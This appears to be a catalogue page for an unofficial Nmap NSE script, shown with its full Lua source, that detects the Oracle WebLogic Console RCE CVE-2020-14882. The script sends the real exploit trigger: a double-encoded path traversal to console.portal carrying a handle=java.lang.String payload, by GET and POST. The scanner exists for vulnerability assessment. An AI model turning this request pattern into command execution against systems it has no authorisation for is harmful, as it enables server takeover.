NSE LIB

Back to library
Unofficial intrusive Vuln

2169-weblogic-cve-2020-14882

Detects the unauthenticated RCE in the Console component of Oracle WebLogic Server (CVE-2020-14882).

Ports

Any

Protocols

n/a

Attribution

Daniel C. Marques ('0xc0da') (upstream: chinarulezzz/nmap-extra-nse)

Usage

Copy the command and adjust the target or script arguments as needed. 

nmap -p 7001 --script weblogic-cve-2020-14882  <ip>
Script Source Toggle

The full script source is stored with this entry and is hidden by default to keep the page easier to scan. 

local string = require "string"
local shortport = require "shortport"
local nmap = require "nmap"
local stdnse = require "stdnse"
local http = require "http"
local vulns = require "vulns"
local table = require "table"

description = [[
Detects the unauthenticated RCE in the Console component of Oracle WebLogic Server
(CVE-2020-14882).
]]
author = "Daniel C. Marques ('0xc0da')"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive"}
---
-- @usage
-- nmap -p 7001 --script weblogic-cve-2020-14882  <ip>
--
-- @output
-- PORT     STATE SERVICE
-- 7001/tcp open  afs3-callback
-- | weblogic-cve-2020-14882:
-- |   VULNERABLE:
-- |   Unauthenticated RCE in Console component of Oracle WebLogic Server
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:CVE-2020-14882
-- |     Risk factor: High
-- |       Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware
-- |       (component: Console) allows unauthenticated remote command execution.
-- |
-- |     Disclosure date: 2020-10-29
-- |     References:
-- |       https://nvd.nist.gov/vuln/detail/CVE-2020-14882
-- |       https://blog.rapid7.com/2020/10/29/oracle-weblogic-unauthenticated-complete-takeover-cve-2020-14882-what-you-need-to-know/
-- |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14882
-- |_      https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
--
portrule = function(host, port)
-- Check from the weblogic-t3-info.nse script by Alessandro ZANN.
  if type(port.version) == "table" and port.version.name_confidence > 3 and port.version.product ~= nil then
    return string.find(port.version.product, "WebLogic", 1, true) and nmap.version_intensity() >= 7
  end
  return shortport.version_port_or_service({7001,7002,7003},"http")(host,port)
end

local function is_vulnerable_to_get(host, port)
-- Triggers the vulnerability using a GET request as described in the original
-- post: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
  local result = false
  local probe = "/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=java.lang.String('nmap')"
  local request = http.get(host, port, probe)
  if (request.status and request.status == 200) and string.match(request.body, "quicklinksrowout") then
    result = true
    stdnse.debug(1,"Vulnerability can be triggered using a GET request")
  end
  return result
end

local function is_vulnerable_to_post(host, port)
-- Triggers the vulnerability using a POST request as described in
-- https://twitter.com/jas502n/status/1321416053050667009
  local result = false
  local options = { header={} }
  local path = "/console/images/%252e%252e%252fconsole.portal"
  local probe = {}
  probe['_nfpb'] = 'false'
  probe['handle'] = 'java.lang.String(%27nmap%27)'
  local request = http.post(host, port, path, options, nil, probe)
  stdnse.debug(1,"Status: %s", request.status)
  if request.status == 302 then
    result = http.response_contains(request, "UnexpectedExceptionPage", true)
    stdnse.debug(1,"Vulnerability can be triggered using a POST request")
  end
  return result
end

action = function(host, port)
  local vuln_status = vulns.STATE.NOT_VULN
  local vuln = {
    title = "Unauthenticated RCE in Console component of Oracle WebLogic Server",
    IDS = {CVE = 'CVE-2020-14882'},
    risk_factor = "High",
    description = [[
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware
(component: Console) allows unauthenticated remote command execution.
      ]],
    references = {
      'https://nvd.nist.gov/vuln/detail/CVE-2020-14882',
      'https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf',
      'https://blog.rapid7.com/2020/10/29/oracle-weblogic-unauthenticated-complete-takeover-cve-2020-14882-what-you-need-to-know/'
      },
    dates = {
      disclosure = {year = '2020', month = '10', day = '29'},
      }
    }

  local report = vulns.Report:new(SCRIPT_NAME, host, port)

  if is_vulnerable_to_get(host, port) then
    vuln.state = vulns.STATE.EXPLOIT
    vuln.exploit_results = {"Exploited using the GET method"}
  elseif is_vulnerable_to_post(host, port) then
    vuln.state = vulns.STATE.EXPLOIT
    vuln.exploit_results = {"Exploited using the POST method"}
  end
  return report:make_output(vuln)
end

Overview

Imported from the upstream repository chinarulezzz/nmap-extra-nse. Detects the unauthenticated RCE in the Console component of Oracle WebLogic Server (CVE-2020-14882).